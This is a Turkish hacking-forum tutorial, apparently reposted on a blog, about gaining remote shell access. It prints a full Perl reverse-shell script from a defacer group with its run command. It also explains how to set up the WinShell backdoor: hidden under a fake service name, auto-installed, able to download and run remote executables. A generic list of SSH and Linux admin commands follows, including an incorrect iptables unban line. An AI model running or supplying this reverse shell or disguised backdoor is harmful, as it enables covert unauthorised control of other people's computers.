Kizma Haci neden kiziyon ?
Biliyorsunki ben hep Secure + Helper Crew gibi 1 seyim. Kim ne sorsa
yardim etmek icin elimden geleni yaparim. Arkadasim forever simdi iyi
bak.sen putty dedin ben yinede her seyini yazayim. Ilk once perl ile Root olmak icin netcat olayi umarim biliyorsundur. 443-cu port acik olur.
CMD-ye
Kod:
perl exploit.pl ip 443
Simdide exploit.pl #source :
Kod:
#!/usr/bin/perl
use IO::Socket;
$system = ‘cmd’;
$ARGC=@ARGV;
print “\n–== DConnect PERL Module – Windows BackTrack // Priv8 – Coded By RedGuard ==– \n\n”;
print “\n–==DefacerzCrew ==–\n\n”;
print “\n–==c0d3 by:RedGuard (DefacerzCrew.IN)==–\n\n”;
print “\n–==Mail : redguard[at]hotmail[d0t]com[d0t]tr==–\n\n”;
print “\n–==Special Thanks ; DefeacerzCrew==–\n\n “;
print “\n–==HoMe : www.defacerzcrew.in/root==–\n\n”;
print “\n–==Greetz : RedGuard ~ FuRty ~ mah0ni ~ Sahmat – And All My Friends==–\n\n”;
if ($ARGC!=2) {
print “Usage: $0 [Host] [Port] \n\n”;
die “Ex3mpl3: $0 127.0.0.1 2121 \n”;
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname(‘tcp’)) or die print “[-] Unable to Resolve Host\n”;
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print “[-] Unable to Connect Host\n”;
print “[+] Resolving HostName\n”;
print “[+] Connecting… $ARGV[0] \n”;
print “[+] Spawning Shell \n”;
print “[+] Connected to remote host \n”;
SOCKET->autoflush();
open(STDIN, “>&SOCKET”);
open(STDOUT,”>&SOCKET”);
open(STDERR,”>&SOCKET”);
print “\n–== DConnect PERL Module – Windows BackTrack // Priv8 – Coded By RedGuard ==– \n\n”;
print “\n–==DefacerzCrew ==–\n\n”;
print “\n–==c0d3 by:RedGuard (DefacerzCrew.IN)==–\n\n”;
print “\n–==Mail : redguard[at]hotmail[d0t]com[d0t]tr==–\n\n”;
print “\n–==Special Thanks ; DefeacerzCrew==–\n\n “;
print “\n–==HoMe : www.defacerzcrew.in/root==–\n\n”;
print “\n–==Greetz : RedGuard ~ FuRty ~ mah0ni ~ Sahmat – And All My Friends==–\n\n”;
system($system);
#tchaw
Simdi putty-e gelelim.
Download :
http://www.chiark.greenend.org.uk/~sgtatham/putty/
C:\Windows\
dizine save ediyoruz.
Putty.exe-ni Ekrana yani desktop-a atmak icinse
# c:\windows aciyoruz windows explorerle
# Gonder > Ekrana (Send to > Desktop)
Kendi Settings-lerinizi Hazirlayin site filan :
Kod:
* Siteadi: example.com veya s00000.gridserver.com
* Port: 22 (oldugu gibi birakin)
* Connection Type: SSH (oldugu gibi birakin)
Eger bu baglanma sizin bilgisayarinda ilk kezse asagidaki gibi 1 error ala bilirsiniz :
Yes-e basarak devam ediyoruz.SSH acildiginda boyle 1 sey goruceksiniz :
Kod:
login as:
Sonra kendi passwordunuzu yaziyorsunuz. Bu PuTTy secure icindir :
Kod:
Using keyboard-interactive authentication. Password:
Kendi SSH Session-una baglandi asagidaki gibi 1 sey goruceksiniz :
Kod:
The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. example.com@n11:~$
Bundan ilave WinShell v5.0 yontemide vardir.
Coder : janker
Download link & Homepage : http://www.janker.org
Simdi aciklamalara gecelim :
#Port : Acik portunuzu kullana bilirsiniz amma en iyisi 5277 -dir
(1-65535 arasinda acik port numaralarini kullanin)#Password : Normalde eklenmez amma isteseniz ekleyin
#SVName : Servis ismi WinShell olarak koyun
#RegNameKey : WiN9x/ME sistemlerde Winshell olur.
#DISPLAYNAME : Gorev yoneticisindeki isim FTP-eyse "FTP Publishing Service"olur
#AutoInstall : adindan gorunduyu gibi otomatik yuklenme
#DOWNEXEC : Komut FOnksiyonu
#URL ADRESS : uzerinde tepineceyiniz url
#DESTINATION FILE : HardDiske kaydedildiyindeki ismi
#COMPRESS WINSHELLSERVER : .exe formatinda yapar.
Konsol Calismasi icin :
Kod:
net start winshell
Kod:
net stop winshell
Baslat > Calistir > CMD ile MS DOS aciyoruz
Kod:
C:\>telnet xxx.xxx.xxx.xxx 5277 Password: 1234(koydugunuz sifre)
Kod:
i Install r Remove p Path b reBoot d shutDown s Shell x eXit q Quit
CMD>http://.../srv.exe
Example :
Kod:
CMD>p C:\winnt\winshell.exe CMD>http://www.tr-ip.com/TR_ip.exe Download to C:\winnt\hello.exe... OK!
Kod:
3. CMD>s Microsoft Windows 2000 [Version 5.00.2195] © Copyright 1985-2000 Microsoft Corp. C:\WINNT\>
Simdide SSH Komutlari :
Kod:
* ls Dizinde bulunan her şeyi listeler.
* ls -a Gizli dosyalar ve dizinlerle beraber listeler.
* ls -l Bütün dosyaları boyut ve tarihini göstererek listeler.
* tar -zxpf Uzantısı tar.gz olan sıkıştırılmış dosyaları açar.
* tar -xpf Uzantısı .tar olan dosyaları açar.
* gunzip Uzantısı .gz olan dosyaları açar.
* cp Dosyayı kopyalar.
* mv Bir dosyayı başka bir dizine taşımanızı sağlar ya da dosya adını değiştirir.
* mkdir Yeni bir dizin oluşturmanızı sağlar.
* rmdir Belirtilen dizini silmenizi sağlar.
* rm Dosya silmenizi sağlar.
* rm -rf Dizin silmenizi sağlar.
* cd Belirtilen dizine geçmenizi sağlar.
* cd .. Bir üst dizine geçmenizi sağlar.
* cd ~ En üst dizine çıkmanızı sağlar.
* pwd O anda bulunduğunuz dizini görüntüler.
* pico Belirtilen dosyayı text editör ile düzenlemenizi sağlar.
* ftp Belirtilen siteye FTP bağlantısı sağlar.
* lynx Belirtilen siteyi görüntüler.
* df Harddisk istatistiklerini gösterir.
* quota Disk kullanımınızı gösterir.
* uname İşletim sisteminin durumunu gösterir.
* whoami Kendi bilgilerinizi gösterir.
* who Sunucuya bağlı olanları gösterir.
* last Hesabınıza yapılan en son bağlantıyı gösterir.
* whereis Belirtilen dosyanın nerede olduğunu gösterir.
* BitchX IRC programını çalıştırır.
* mail Postalarınızı kontrol eder.
* ps -x Sizin çalıştırdığınız işlemleri gösterir.
* ps -a Sunucuda çalıştırılan tüm işlemleri gösterir.
* ps -ux Çalıştırılan işlemlerin CPU/RAM kullanımıyla gösterir.
* kill Pid numarası verilen işlemi durdurur.
* kill -9 Pid numarası verilen eggdrop işlemini durdurur.
* killall Belirtilen program türündeki tüm işlemleri durdurur.
* whatis Belirtilen komutun açıklamasını verir.
* man Komut hakkında yardım görüntüler
* passwd Shell hesabınıza girerken kullandığınız şifreyi değiştirmenizi sağlar.
* vhosts ya da vhost Sistemde bulunan vhostları (virtual host) listeler.(BNC için kullanabilirsiniz)
* ROOT MAKİNEDEN İP ÖĞRENME: ip addr
* ROOTTA HESAP AÇMAK : adduser login & chown mavigok /home/login & passwd pass1, passwd pass2
* reboot: Sunucuya restart atar
* service mysql restart mysql restart atar
* service httpd restart apache ye rest atar
* service httpd stop Sitelere ulaşımı kapatır
* apf -d ipadresi verilen ipe ban atar
* service apf restart apf ye restart atar
* netstat -n sunucuya baglanan ipleri gösterir
* netstat -a sunucuya bağlanan reseller ipleri gösterir(Proxy kullanmanız fark etmez her zaman gerçek çıkış ipi görünür)
* pico ssh üzerinden text editor ile dosya içeriğini görme ve düzenlemeye yarar.
* top Sistem cpu kullanımını gösterir.
* uptime Uptime Durumu
IP BAN
* ip banlama
* iptables -A INPUT -s 85.159.54.48 -j DROP
* ip ban kaldırma
* iptables -X INPUT -s 85.159.54.48 -j DROP
Servera dosya çekme
* wget indirilecek-dosya-adresi
Zip açma
* unzip dosya.zip
tar.gz açma
* tar -zxvf dosya.tar.gz
gzip açma
* gunzip dosya.tar.gz
Dosya sıkıştırmak
* tar cvzf dosyam.tar.gz sıkıştırılacak-dosya
Sql Yükleme
* mysql -h dbname -u dbuser -p dbpasword < dbname.sql
http://the.earth.li/~sgtatham/putty/0.62/htmldoc/
Basarilar + Respect! ^_^ Peace!
Avatar Fearless
Topic : http://www.millikuvvetler.net/showthread.php?t=8652
Hiç yorum yok:
Yorum Gönder